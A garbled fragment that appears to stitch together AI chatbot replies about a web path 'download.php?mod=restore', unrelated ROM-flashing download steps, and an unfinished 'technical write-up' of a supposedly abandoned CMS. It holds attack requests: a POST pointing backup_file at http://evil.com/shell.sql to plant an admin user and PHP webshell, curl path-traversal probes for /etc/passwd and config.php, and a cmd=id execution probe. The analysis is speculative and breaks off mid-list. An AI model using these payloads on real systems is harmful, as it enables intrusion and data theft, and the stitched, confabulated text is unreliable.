If mod=restore expects a POST with backup_file:
POST /emotionhot/download.php?mod=restore HTTP/1.1 Content-Type: application/x-www-form-urlencoded
backup_file=http://evil.com/shell.sql&restore_db=1
Then the script fetches and executes the remote SQL → inserts admin user + PHP webshell via INTO OUTFILE.
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Click the Download button below to get the mod_restore.zip file.
After downloading, flash via recovery (if ZIP) or install as an APK (if applicable).
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If you could provide more details or clarify your specific needs, I'd be happy to try and assist further.
This is a specific query regarding a file path from an old, likely abandoned, software package called EMUICOMP (or EMUICOM). The path you provided:
http://wwwemuicom/emotionhot/download.php?mod=restore
suggests a web-based restoration module for a gaming or emulation-related content management system (CMS), popular in the early 2000s for ROM/ISO sites.
Below is a deep technical write-up analyzing the structure, security risks, and forensic implications of such a module.
curl "http://target/emotionhot/download.php?mod=restore&debug=1"
curl "http://target/emotionhot/download.php?mod=restore&file=../../../../etc/passwd"
Since the script name is generic, attackers would test:
/modules/download.php?mod=restore&backup=../../../config.php
/download.php?mod=restore&action=exec&cmd=id
Possible outcomes: